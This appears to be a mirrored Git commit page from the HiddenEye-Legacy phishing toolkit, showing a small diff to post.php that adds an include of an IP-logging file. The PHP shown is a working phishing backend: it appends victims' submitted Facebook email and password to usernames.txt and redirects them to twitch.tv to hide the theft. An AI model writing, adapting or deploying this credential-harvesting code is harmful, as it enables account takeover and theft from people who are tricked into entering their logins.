mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Update post.php
This commit is contained in:
parent
e8820becfc
commit
96ef3b8a97
|
@ -1,5 +1,6 @@
|
|||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[FB-EMAIL]: " . $_POST['fb_email'] . " [FB-PASS]: " . $_POST['fb_pass'] . "\n", FILE_APPEND);
|
||||
header('Location: https://twitch.tv/');
|
||||
|
|
Loading…
Reference in New Issue
Block a user